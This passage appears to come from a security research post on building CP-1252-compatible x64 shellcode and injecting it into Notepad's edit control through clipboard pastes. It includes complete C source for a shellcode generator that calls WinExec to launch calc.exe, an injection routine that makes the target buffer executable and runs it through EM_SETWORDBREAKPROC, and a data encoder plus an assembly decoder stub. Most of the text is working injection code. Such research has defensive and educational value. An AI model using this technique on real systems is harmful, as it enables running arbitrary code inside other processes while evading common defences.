    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xba\x00\x12\x00\xff" /* mov   edx, 0xff001200   */
    "\x00\x27"             /* add   byte [rdi], ah    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xae"                 /* scasb                   */
    "\x00\x3f"             /* add   byte [rdi], bh    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xae"                 /* scasb                   */
    "\x00\x2f"             /* add   byte [rdi], ch    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\xae"                 /* scasb                   */
    "\x00\x37"             /* add   byte [rdi], dh    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    "\x58"                 /* pop   rax               */
    "\x00\x4d\x00"         /* add   byte [rbp], cl    */
    
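    The order in which the bytes are stored determines the value that POP RAX finally loads. The sketch below models the zeroed stack slot, the ADD BYTE [RDI] stores and the SCASB increments (assuming the Direction Flag is clear). The function name is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store four bytes at increasing addresses, then read them back as one
   little-endian dword, the way POP RAX would. */
uint32_t store_bytes_then_load(const uint8_t b[4]) {
    assert(b != NULL);
    uint8_t slot[8] = {0};                /* push 0               */
    uint8_t *rdi = slot;                  /* push rsp / pop rdi   */
    for (int i = 0; i < 4; i++) {
        *rdi = (uint8_t)(*rdi + b[i]);    /* add byte [rdi], reg  */
        rdi++;                            /* scasb, DF clear      */
    }
    return (uint32_t)slot[0]
         | ((uint32_t)slot[1] << 8)
         | ((uint32_t)slot[2] << 16)
         | ((uint32_t)slot[3] << 24);
}
```

    Storing 0x78, 0x56, 0x34, 0x12 in that order yields 0x12345678, whereas storing 0x12, 0x34, 0x56, 0x78 yields 0x78563412.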

    3.6 Two Byte Instructions

    If all you need are two byte instructions that contain one null byte, the following may be considered. For the branch instructions, the target is the next instruction whether the condition is true or false, so execution simply continues. The loop instructions might be useful if you want to subtract 1 from an address held in RCX. To add 1 or 4 to an address, copy it to RDI and use SCASB or SCASD (assuming the Direction Flag is clear). LODSB or LODSD can be used too if the address is in RSI, but remember that they overwrite AL and EAX respectively.

        ; logic
        or al, 0
        
        xor al, 0
        
        and al, 0
        
        ; arithmetic
        add al, 0
        
        adc al, 0
        
        sbb al, 0
        
        sub al, 0
        
        ; comparison predicates
        cmp al, 0
        
        test al, 0
        
        ; data transfer
        mov al, 0
        mov ah, 0
        
        mov bl, 0
        mov bh, 0
        
        mov cl, 0
        mov ch, 0
        
        mov dl, 0
        mov dh, 0
        
        ; branches
        jmp $+2
        
        jo $+2
        jno $+2
      
        jb $+2
        jae $+2
        
        je $+2
        jne $+2
        
        jbe $+2
        ja $+2
        
        js $+2
        jns $+2
        
        jp $+2
        jnp $+2
        
        jl $+2
        jge $+2
        
        jle $+2
        jg $+2
    
        jrcxz $+2
        
        loop $+2
        
        loope $+2
        
        loopne $+2
    
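    Since the second byte of each instruction above is the null supplied by the conversion, the Ansi form of each one is just its opcode byte. The sketch below lists those opcode bytes and checks them against the bad-character list from section 2. The array and function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* First byte of each two-byte instruction listed above. */
const uint8_t TWO_BYTE_OPCODES[] = {
    0x0C, 0x34, 0x24,                   /* or / xor / and al, imm8        */
    0x04, 0x14, 0x1C, 0x2C,             /* add / adc / sbb / sub al, imm8 */
    0x3C, 0xA8,                         /* cmp / test al, imm8            */
    0xB0, 0xB4, 0xB3, 0xB7,             /* mov al / ah / bl / bh, imm8    */
    0xB1, 0xB5, 0xB2, 0xB6,             /* mov cl / ch / dl / dh, imm8    */
    0xEB,                               /* jmp short                      */
    0x70, 0x71, 0x72, 0x73,             /* jo, jno, jb, jae               */
    0x74, 0x75, 0x76, 0x77,             /* je, jne, jbe, ja               */
    0x78, 0x79, 0x7A, 0x7B,             /* js, jns, jp, jnp               */
    0x7C, 0x7D, 0x7E, 0x7F,             /* jl, jge, jle, jg               */
    0xE3, 0xE2, 0xE1, 0xE0              /* jrcxz, loop, loope, loopne     */
};

/* Same bad-character list as the CF_TEXT discussion in section 2. */
int opcode_is_pasteable(uint8_t b) {
    if (b == 0x00) return 0;
    if (b >= 0x80 && b <= 0x8C) return 0;
    if (b >= 0x91 && b <= 0x9C) return 0;
    return b != 0x8E && b != 0x9E && b != 0x9F;
}

/* Count how many opcodes in the table survive the filter. */
size_t count_pasteable(const uint8_t *ops, size_t n) {
    assert(ops != NULL);
    size_t ok = 0;
    for (size_t i = 0; i < n; i++) ok += (size_t)opcode_is_pasteable(ops[i]);
    return ok;
}
```

    Every opcode in the table passes the filter, so each instruction can be pasted as a single character.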

    3.7 Prefix Codes

    Some of these prefixes can be used to pad an instruction. The only instructions I tested were 8-Bit operations.

    Prefix Description
    0x2E, 0x3E Branch hints have no effect on anything newer than a Pentium 4. Harmless to use up a byte of space between instructions.
    0xF0 The LOCK prefix guarantees the instruction has exclusive use of all shared memory, until the instruction completes execution.
    0xF2, 0xF3 REP/REPE (0xF3) tells the CPU to repeat execution of a string manipulation instruction like MOVS, STOS, CMPS or SCAS until RCX is zero; with CMPS and SCAS it also stops when the Zero Flag (ZF) is cleared. REPNE (0xF2) repeats execution until RCX is zero or ZF is set.
    0x26, 0x2E, 0x36, 0x3E, 0x64, 0x65 The Extra Segment (ES) (0x26) prefix is used for the destination of string operations. The Code Segment (CS) (0x2E) for all instructions is the same as a branch hint and has no effect. The Stack Segment (0x36) is used for storing and loading local variables with instructions like PUSH/POP. The Data Segment (DS) (0x3E) for all data references, except stack and is also the same as a branch hint, which has no effect. FS(0x64) and GS(0x65) are not designated, but you’ll see them used to access the Thread Environment Block (TEB) on Windows or the Thread Local Storage (TLS) on Linux.
    0x66, 0x67 Used to override the default size of a data type in 32-bit mode for a PUSH/POP or MOV. NASM/YASM support the operand-size (0x66) and address-size (0x67) prefixes using o16, o32, a16 and a32.
    0x40 – 0x4F REX prefixes for 64-Bit mode.

    4. Generating Shellcode

    Some things to consider when writing your own.

    • Preserve all non-volatile registers used, for example RSI, RDI, RBP and RBX.
    • Allocate 32 bytes for home space. This will be used by any API you invoke.
    • Before invoking an API, ensure the value of SP is aligned by 16 bytes minus 8.

    Some APIs use SIMD instructions, usually for memcpy() or memset() of small blocks of data. To achieve optimal performance, the data accessed must be aligned by 16 bytes. If the stack pointer is misaligned and SIMD instructions are used to read or write relative to SP, this will result in an unhandled exception. Since we can’t use a CALL instruction, RET is used instead, and once executed it removes the API address from the stack. If SP is not aligned by 16 bytes at that point, expect trouble! 🙂
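
    One way to read the alignment rule, based on the Microsoft x64 convention that the stack is 16-byte aligned before a CALL pushes the return address, is that RSP modulo 16 should equal 8 at the first instruction of the API. When RET is used to transfer control, RSP grows by 8 as the API address is popped. The helpers below are a sketch of that arithmetic only; their names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* At API entry RSP points at the return address and should be 8 mod 16. */
int rsp_ok_at_entry(uint64_t rsp) {
    return (rsp & 0xF) == 8;
}

/* RET pops the API address (8 bytes) before the API starts executing. */
int rsp_ok_before_ret(uint64_t rsp) {
    assert((rsp & 7) == 0);           /* stack slots are 8 bytes wide */
    return rsp_ok_at_entry(rsp + 8);
}
```

    Under this reading, a single extra 8-byte push before the RET sequence is enough to correct a misaligned stack.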

    Using previous examples, the following code will construct a CP-1252 compatible shellcode to execute calc.exe using kernel32!WinExec(). This is simply to demonstrate that injection via notepad’s edit control works.

    // the max address for virtual memory on 
    // windows is (2 ^ 47) - 1 or 0x7FFFFFFFFFFF
    #define MAX_ADDR 6
    
    // only useful for CP_ACP codepage
    static
    int is_cp1252_allowed(int ch) {
      
        // zero is allowed, but we can't use it for the clipboard
        if(ch == 0) return 0;
        
        // bytes converted to double byte characters
        if(ch >= 0x80 && ch <= 0x8C) return 0;
        if(ch >= 0x91 && ch <= 0x9C) return 0;
        
        return (ch != 0x8E && ch != 0x9E && ch != 0x9F);
    }
    
    // Allocate 64-bit buffer on the stack.
    // Then place the address in RDI for writing.
    #define STORE_ADDR_SIZE 10
    
    char STORE_ADDR[] = {
      /* 0000 */ "\x6a\x00"             /* push 0                */
      /* 0002 */ "\x54"                 /* push rsp              */
      /* 0003 */ "\x00\x5d\x00"         /* add  byte [rbp], bl   */
      /* 0006 */ "\x5f"                 /* pop  rdi              */
      /* 0007 */ "\x00\x5d\x00"         /* add  byte [rbp], bl   */
    };
    
    // Load an 8-Bit immediate value into AH
    #define LOAD_BYTE_SIZE 5
    
    char LOAD_BYTE[] = {
      /* 0000 */ "\xb8\x00\xff\x00\x4d" /* mov   eax, 0x4d00ff00 */
    };
    
    // Subtract 32 from AH
    #define SUB_BYTE_SIZE 8
    
    char SUB_BYTE[] = {
      /* 0000 */ "\x00\x5d\x00"         /* add   byte [rbp], bl  */
      /* 0003 */ "\x2d\x00\x20\x00\x5d" /* sub   eax, 0x5d002000 */
    };
    
    // Store AH in buffer and advance RDI by 1
    #define STORE_BYTE_SIZE 9
    
    char STORE_BYTE[] = {
      /* 0000 */ "\x00\x27"             /* add   byte [rdi], ah  */
      /* 0002 */ "\x00\x5d\x00"         /* add   byte [rbp], bl  */
      /* 0005 */ "\xae"                 /* scasb                 */
      /* 0006 */ "\x00\x5d\x00"         /* add   byte [rbp], bl  */
    };
    
    // Transfers control of execution to kernel32!WinExec
    #define RET_SIZE 2
    
    char RET[] = {
      /* 0000 */ "\xc3" /* ret  */
      /* 0001 */ "\x00" /* null byte that follows after widening */
    };
    
    #define CALC3_SIZE 164
    #define RET_OFS (0x20 + 2)
    
    char CALC3[] = {
      /* 0000 */ "\xb0\x00"                 /* mov   al, 0                 */
      /* 0002 */ "\xc8\x00\x01\x00"         /* enter 0x100, 0              */
      /* 0006 */ "\x55"                     /* push  rbp                   */
      /* 0007 */ "\x00\x45\x00"             /* add   byte [rbp], al        */
      /* 000A */ "\x6a\x00"                 /* push  0                     */
      /* 000C */ "\x54"                     /* push  rsp                   */
      /* 000D */ "\x00\x45\x00"             /* add   byte [rbp], al        */
      /* 0010 */ "\x5d"                     /* pop   rbp                   */
      /* 0011 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0014 */ "\x57"                     /* push  rdi                   */
      /* 0015 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0018 */ "\x56"                     /* push  rsi                   */
      /* 0019 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 001C */ "\x53"                     /* push  rbx                   */
      /* 001D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0020 */ "\xb8\x00\x4d\x00\xff"     /* mov   eax, 0xff004d00       */
      /* 0025 */ "\x00\xe1"                 /* add   cl, ah                */
      /* 0027 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 002A */ "\xb8\x00\x01\x00\xff"     /* mov   eax, 0xff000100       */
      /* 002F */ "\x00\xe5"                 /* add   ch, ah                */
      /* 0031 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0034 */ "\x51"                     /* push  rcx                   */
      /* 0035 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0038 */ "\x5b"                     /* pop   rbx                   */
      /* 0039 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 003C */ "\x6a\x00"                 /* push  0                     */
      /* 003E */ "\x54"                     /* push  rsp                   */
      /* 003F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0042 */ "\x5f"                     /* pop   rdi                   */
      /* 0043 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0046 */ "\x57"                     /* push  rdi                   */
      /* 0047 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 004A */ "\x59"                     /* pop   rcx                   */
      /* 004B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 004E */ "\x6a\x00"                 /* push  0                     */
      /* 0050 */ "\x54"                     /* push  rsp                   */
      /* 0051 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0054 */ "\x58"                     /* pop   rax                   */
      /* 0055 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0058 */ "\xc7\x00\x63\x00\x6c\x00" /* mov   dword [rax], 0x6c0063 */
      /* 005E */ "\x58"                     /* pop   rax                   */
      /* 005F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0062 */ "\x35\x00\x61\x00\x63"     /* xor   eax, 0x63006100       */
      /* 0067 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 006A */ "\xab"                     /* stosd                       */
      /* 006B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 006E */ "\x6a\x00"                 /* push  0                     */
      /* 0070 */ "\x54"                     /* push  rsp                   */
      /* 0071 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0074 */ "\x58"                     /* pop   rax                   */
      /* 0075 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0078 */ "\xc6\x00\x05"             /* mov   byte [rax], 5         */
      /* 007B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 007E */ "\x5a"                     /* pop   rdx                   */
      /* 007F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0082 */ "\x53"                     /* push  rbx                   */
      /* 0083 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0086 */ "\x6a\x00"                 /* push  0                     */
      /* 0088 */ "\x6a\x00"                 /* push  0                     */
      /* 008A */ "\x6a\x00"                 /* push  0                     */
      /* 008C */ "\x6a\x00"                 /* push  0                     */
      /* 008E */ "\x6a\x00"                 /* push  0                     */
      /* 0090 */ "\x53"                     /* push  rbx                   */
      /* 0091 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0094 */ "\x90"                     /* nop                         */
      /* 0095 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0098 */ "\x90"                     /* nop                         */
      /* 0099 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 009C */ "\x90"                     /* nop                         */
      /* 009D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 00A0 */ "\x90"                     /* nop                         */
      /* 00A1 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
    };
    
    #define CALC4_SIZE 79
    #define RET_OFS2 (0x18 + 2)
    
    char CALC4[] = {
      /* 0000 */ "\x59"                 /* pop  rcx              */
      /* 0001 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0004 */ "\x59"                 /* pop  rcx              */
      /* 0005 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0008 */ "\x59"                 /* pop  rcx              */
      /* 0009 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 000C */ "\x59"                 /* pop  rcx              */
      /* 000D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0010 */ "\x59"                 /* pop  rcx              */
      /* 0011 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0014 */ "\x59"                 /* pop  rcx              */
      /* 0015 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0018 */ "\xb8\x00\x4d\x00\xff" /* mov  eax, 0xff004d00  */
      /* 001D */ "\x00\xe1"             /* add  cl, ah           */
      /* 001F */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0022 */ "\x51"                 /* push rcx              */
      /* 0023 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0026 */ "\x58"                 /* pop  rax              */
      /* 0027 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 002A */ "\xc6\x00\xc3"         /* mov  byte [rax], 0xc3 */
      /* 002D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0030 */ "\x59"                 /* pop  rcx              */
      /* 0031 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0034 */ "\x5b"                 /* pop  rbx              */
      /* 0035 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0038 */ "\x5e"                 /* pop  rsi              */
      /* 0039 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 003C */ "\x5f"                 /* pop  rdi              */
      /* 003D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0040 */ "\x59"                 /* pop  rcx              */
      /* 0041 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0044 */ "\x6a\x00"             /* push 0                */
      /* 0046 */ "\x58"                 /* pop  rax              */
      /* 0047 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 004A */ "\x5c"                 /* pop  rsp              */
      /* 004B */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 004E */ "\x5d"                 /* pop  rbp              */
    };
    
    
    static
    u8* cp1252_generate_winexec(int pid, int *cslen) {
        int     i, ofs, outlen;
        u8      *cs, *out;
        HMODULE m;
        w64_t   addr;
        
        // it won't exceed 512 bytes
        out = cs = (u8*)VirtualAlloc(
          NULL, 4096, 
          MEM_COMMIT | MEM_RESERVE, 
          PAGE_EXECUTE_READWRITE);
        // bail out if the allocation failed
        if(cs == NULL) return NULL;
        
        // initialize parameters for WinExec()
        memcpy(out, CALC3, CALC3_SIZE);
        out += CALC3_SIZE;
    
        // initialize RDI for writing
        memcpy(out, STORE_ADDR, STORE_ADDR_SIZE);
        out += STORE_ADDR_SIZE;
    
        // ***********************************
        // store kernel32!WinExec on stack
        m = GetModuleHandle("kernel32");
        addr.q = ((PBYTE)GetProcAddress(m, "WinExec") - (PBYTE)m);
        m = GetProcessModuleHandle(pid, "kernel32.dll");
        addr.q += (ULONG_PTR)m;
        
        for(i=0; i<MAX_ADDR; i++) {      
          // load a byte into AH
          memcpy(out, LOAD_BYTE, LOAD_BYTE_SIZE);
          out[2] = addr.b[i];
        
          // if byte not allowed for CP1252, add 32
          if(!is_cp1252_allowed(out[2])) {
            out[2] += 32;
            // subtract 32 from byte at runtime
            memcpy(&out[LOAD_BYTE_SIZE], SUB_BYTE, SUB_BYTE_SIZE);
            out += SUB_BYTE_SIZE;
          }
          out += LOAD_BYTE_SIZE;
          // store AH in [RDI], increment RDI
          memcpy(out, STORE_BYTE, STORE_BYTE_SIZE);
          out += STORE_BYTE_SIZE;
        }
        
        // calculate length of constructed code
        ofs = (int)(out - (u8*)cs) + 2;
        
        // first offset
        cs[RET_OFS] = (uint8_t)ofs;
        
        memcpy(out, RET, RET_SIZE);
        out += RET_SIZE;
        
        memcpy(out, CALC4, CALC4_SIZE);
        
        // second offset
        ofs = CALC4_SIZE;
        ((u8*)out)[RET_OFS2] = (uint8_t)ofs;
        out += CALC4_SIZE;
        
        outlen = ((int)(out - (u8*)cs) + 1) & -2;
    
        // convert to ascii
        for(i=0; i<=outlen; i+=2) {
          cs[i/2] = cs[i];
        }
    
        *cslen = outlen / 2;
        // return pointer to code
        return cs;
    }
    
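    Two details of the generator are worth checking in isolation: that adding 32 always turns a disallowed address byte into an allowed one, and that dropping every second byte recovers the Ansi form. The sketch below reuses the filter from the listing above; encode_addr_byte, all_bytes_encodable and narrow_even_bytes are hypothetical names, and the narrowing helper is a simplified variant of the loop in cp1252_generate_winexec rather than a copy of it.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Filter from the article: bytes that survive the CF_TEXT round trip. */
int is_cp1252_allowed(int ch) {
    if (ch == 0) return 0;
    if (ch >= 0x80 && ch <= 0x8C) return 0;
    if (ch >= 0x91 && ch <= 0x9C) return 0;
    return (ch != 0x8E && ch != 0x9E && ch != 0x9F);
}

/* Returns the byte to embed in MOV EAX; *needs_fixup is set when the
   shellcode must subtract 32 from AH at run time. */
uint8_t encode_addr_byte(uint8_t b, int *needs_fixup) {
    assert(needs_fixup != NULL);
    *needs_fixup = !is_cp1252_allowed(b);
    return *needs_fixup ? (uint8_t)(b + 32) : b;
}

/* Exhaustively check that every byte value encodes to an allowed byte
   and decodes back to itself. */
int all_bytes_encodable(void) {
    for (int b = 0; b < 256; b++) {
        int fix;
        uint8_t e = encode_addr_byte((uint8_t)b, &fix);
        if (!is_cp1252_allowed(e)) return 0;
        if ((uint8_t)(e - (fix ? 32 : 0)) != (uint8_t)b) return 0;
    }
    return 1;
}

/* Keep the bytes at even offsets, in place; returns the new length. */
size_t narrow_even_bytes(uint8_t *buf, size_t len) {
    assert(buf != NULL);
    for (size_t i = 0; i < len; i += 2) buf[i / 2] = buf[i];
    return (len + 1) / 2;
}
```

    The exhaustive check passes because the largest disallowed byte is 0x9F, and 0x9F + 0x20 = 0xBF is still below 0x100 and outside the bad ranges.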

    5. Injecting and Executing Shellcode

    The following steps are used.

    1. Execute notepad.exe and obtain a window handle for the edit control.
    2. Get the edit control handle using the EM_GETHANDLE message.
    3. Generate text equal to or greater than the size of the shellcode and copy it to the clipboard.
    4. Assign a NULL pointer to lastbuf.
    5. Read the address of the input buffer from the EM handle and assign it to embuf.
    6. If lastbuf and embuf are equal, goto step 9.
    7. Clear the memory buffer using EM_SETSEL and WM_CLEAR.
    8. Send the WM_PASTE message to the edit control window handle. Wait 1 second, then goto step 5.
    9. Set embuf to PAGE_EXECUTE_READWRITE.
    10. Generate CP-1252 compatible shellcode and copy it to the clipboard.
    11. Set the edit control word break function to embuf using EM_SETWORDBREAKPROC.
    12. Trigger execution of shellcode using WM_LBUTTONDBLCLK.
    BOOL em_inject(void) {
        HWND   npw, ecw;
        w64_t  emh, lastbuf, embuf;
        SIZE_T rd;
        HANDLE hp;
        DWORD  cslen, pid, old;
        BOOL   r;
        PBYTE  cs;
        
        char   buf[1024];
        
        // get window handle for notepad class
        npw = FindWindow("Notepad", NULL);
        
        // get window handle for edit control
        ecw = FindWindowEx(npw, NULL, "Edit", NULL);
        
        // get the EM handle for the edit control
        emh.p = (PVOID)SendMessage(ecw, EM_GETHANDLE, 0, 0);
        
        // get the process id for the window
        GetWindowThreadProcessId(ecw, &pid);
        
        // open the process for reading and changing memory permissions
        hp = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION, FALSE, pid);
    
        // copy some test data to the clipboard
        memset(buf, 0x4d, sizeof(buf));
        CopyToClipboard(CF_TEXT, buf, sizeof(buf));    
        
        // loop until target buffer address is stable
        lastbuf.p = NULL;
        r = FALSE;
    
        for(;;) {
          // read the address of input buffer     
          ReadProcessMemory(hp, emh.p, 
            &embuf.p, sizeof(ULONG_PTR), &rd);
    
          // Address hasn't changed? exit loop
          if(embuf.p == lastbuf.p) {
            r = TRUE;
            break;
          }
          // save this address
          lastbuf.p = embuf.p;
        
          // clear the contents of edit control
          SendMessage(ecw, EM_SETSEL, 0, -1);
          SendMessage(ecw, WM_CLEAR, 0, 0);
          
          // send the WM_PASTE message to the edit control
          // allow notepad some time to read the data from clipboard
          SendMessage(ecw, WM_PASTE, 0, 0);
          Sleep(WAIT_TIME);
        }
        
        if(r) {
          // set buffer to RWX
          VirtualProtectEx(hp, embuf.p, 4096, PAGE_EXECUTE_READWRITE, &old);
            
          // generate shellcode and copy to clipboard
          cs = cp1252_generate_winexec(pid, &cslen);
          CopyToClipboard(CF_TEXT, cs, cslen);
            
          // clear buffer and inject shellcode
          SendMessage(ecw, EM_SETSEL, 0, -1);
          SendMessage(ecw, WM_CLEAR, 0, 0);
          SendMessage(ecw, WM_PASTE, 0, 0);
          Sleep(WAIT_TIME);
          
          // set the word break procedure to address of shellcode and execute
          SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)embuf.p);
          SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
          SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
          
          // set buffer to RW
          VirtualProtectEx(hp, embuf.p, 4096, PAGE_READWRITE, &old);
        }
        CloseHandle(hp);
        return r;
    }
    

    6. Demonstration

    Notepad doesn’t crash as a result of the shellcode running. The demo terminates it once the thread ends.

    7. Encoding Arbitrary Data

    Encoding data and code require different solutions. Raw data that doesn’t execute requires “bad characters” removed from it, while code must execute successfully after the conversion, which is not easy to accomplish in practice. The following encoding and decoding algorithms are based on a previous post about removing null characters in shellcode.

    7.1 Encoding

    1. Read a byte from the input file or stream and assign to X.
    2. If X plus 1 is allowed, goto step 6.
    3. Save escape code (0x01) to the output file or stream.
    4. XOR X with 8-Bit key.
    5. Save X to the output file or stream, goto step 7.
    6. Save X plus 1 to the output file or stream.
    7. Repeat steps 1-6 until EOF.
    // encode raw data to CP-1252 compatible data
    static
    void cp1252_encode(FILE *in, FILE *out) {
        uint8_t c, t;
        
        for(;;) {
          // read byte
          c = getc(in);
          // end of file? exit
          if(feof(in)) break;
          // if the result of c + 1 is disallowed
          if(!is_decoder_allowed(c + 1)) {
            // write escape code
            putc(0x01, out);
            // save byte XOR'd with the 8-Bit key
            putc(c ^ CP1252_KEY, out);
          } else {
            // save byte plus 1
            putc(c + 1, out);
          }
        }
    }
    

    7.2 Decoding

    1. Read a byte from the input file or stream and assign to X.
    2. If X is not an escape code, goto step 6.
    3. Read a byte from the input file or stream and assign to X.
    4. XOR X with 8-Bit key.
    5. Save X to the output file or stream, goto step 7.
    6. Save X – 1 to the output file or stream.
    7. Repeat steps 1-6 until EOF.
    // decode data processed with cp1252_encode to their original values
    static
    void cp1252_decode(FILE *in, FILE *out) {
        uint8_t c, t;
        
        for(;;) {
          // read byte
          c = getc(in);
          // end of file? exit
          if(feof(in)) break;
          // if this is an escape code
          if(c == 0x01) {
            // read next byte
            c = getc(in);
            // XOR the 8-Bit key
            putc(c ^ CP1252_KEY, out);
          } else {
            // save byte minus one
            putc(c - 1, out);
          }
        }
    }
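
    To check that the two routines really are inverses, here is a minimal in-memory sketch of the same scheme. The buffer-based encode_buf and decode_buf are hypothetical names, and allowed() is only a stand-in for is_decoder_allowed(): I'm assuming it rejects the null byte, the escape code and 0x80-0x9F, which may not match the real predicate exactly.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define CP1252_KEY 0x4D   /* same key as the assembly decoder */
#define ESCAPE     0x01   /* escape code used by the encoder  */

/* ASSUMPTION: stand-in for is_decoder_allowed(); the real one may differ */
static int allowed(uint8_t b) {
    return b != 0x00 && b != ESCAPE && !(b >= 0x80 && b <= 0x9F);
}

/* Encode len bytes from src; dst must hold up to 2 * len bytes.
   Returns the encoded length. */
size_t encode_buf(const uint8_t *src, size_t len, uint8_t *dst) {
    size_t n = 0;
    assert(src != NULL && dst != NULL);
    for (size_t i = 0; i < len; i++) {
        uint8_t next = (uint8_t)(src[i] + 1);
        if (allowed(next)) {
            dst[n++] = next;                           /* byte plus 1 */
        } else {
            dst[n++] = ESCAPE;                         /* escape code */
            dst[n++] = (uint8_t)(src[i] ^ CP1252_KEY); /* byte XOR key */
        }
    }
    return n;
}

/* Decode len bytes from src; dst must hold up to len bytes.
   Returns the decoded length. */
size_t decode_buf(const uint8_t *src, size_t len, uint8_t *dst) {
    size_t n = 0;
    assert(src != NULL && dst != NULL);
    for (size_t i = 0; i < len; i++) {
        if (src[i] == ESCAPE && i + 1 < len) {
            dst[n++] = (uint8_t)(src[++i] ^ CP1252_KEY);
        } else {
            dst[n++] = (uint8_t)(src[i] - 1);
        }
    }
    return n;
}
```

    With this stand-in predicate, encoding all 256 byte values escapes 34 of them, so the output is 290 bytes long, and decoding returns the original 256 bytes.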
    

    The assembly is compatible with both 32 and 64-bit mode of the x86 architecture.

    ; cp1252 decoder in 40 bytes of x86/amd64 assembly
    ; presumes to be executing in RWX memory
    ; needs stack allocation if executing from RX memory
    ;
    ; odzhan
    
        bits 32
        
        %define CP1252_KEY 0x4D
        
        jmp    init_decode       ; read the program counter
        
        ; esi = source
        ; edi = destination 
        ; ecx = length
    decode_bytes:
        lodsb                    ; read a byte
        dec    al                ; c - 1
        jnz    save_byte
        lodsb                    ; skip null byte
        lodsb                    ; read next byte
        xor    al, CP1252_KEY    ; c ^= CP1252_KEY
    save_byte:
        stosb                    ; save in buffer
        lodsb                    ; skip null byte
        loop   decode_bytes
        ret
    load_data:
        pop    esi               ; esi = start of data
        ; ********************** ; decode the 32-bit length
    read_len:
        push   0                 ; len = 0
        push   esp               ; 
        pop    edi               ; edi = &len
        push   4                 ; 32-bits
        pop    ecx
        call   decode_bytes
        pop    ecx               ; ecx = len
        
        ; ********************** ; decode remainder of data
        push   esi               ; 
        pop    edi               ; edi = encoded data
        push   esi               ; save address for RET
        jmp    decode_bytes
    init_decode:
        call   load_data
        ; CP1252 encoded data goes here..
        
    

    The decoder could be stored at the beginning of the buffer and the callback could be stored higher up in memory.

    8. Acknowledgements

    I’d like to thank Adam for feedback and advice on this post, specifically about CF_UNICODETEXT.

    9. Further Research

    List of papers and presentations relevant to this post. If you know of any good papers on writing Unicode shellcodes that aren’t listed here, feel free to email me with the details.

    10. Code Scrapheap

    What follows are just some bits of code that were considered, but not used in the end. Explanations are provided for why they were discarded.

    The first one tries to set EAX to 0. Set AL and AH to 0. Then extend AX to EAX using CWDE. Unfortunately 0x98 can’t be used.

    "\xb0\x00"     /* mov  al, 0             */
    "\x00\x4d\x00" /* add  byte [ebp], cl    */
    "\xb4\x00"     /* mov  ah, 0             */
    "\x00\x4d\x00" /* add  byte [ebp], cl    */
    "\x98"         /* cwde                   */
    

    Another idea for setting EAX to 0. Clear the Carry Flag using CLC, then set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX, which sets EAX to 0. Can you spot the problem? 🙂 Well, the ADD affects the Carry Flag, so that’s why it doesn’t work as intended. Of course, it might work, depending on what RBP points to and the value of CL.

    "\xf8"                 /* clc                       */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
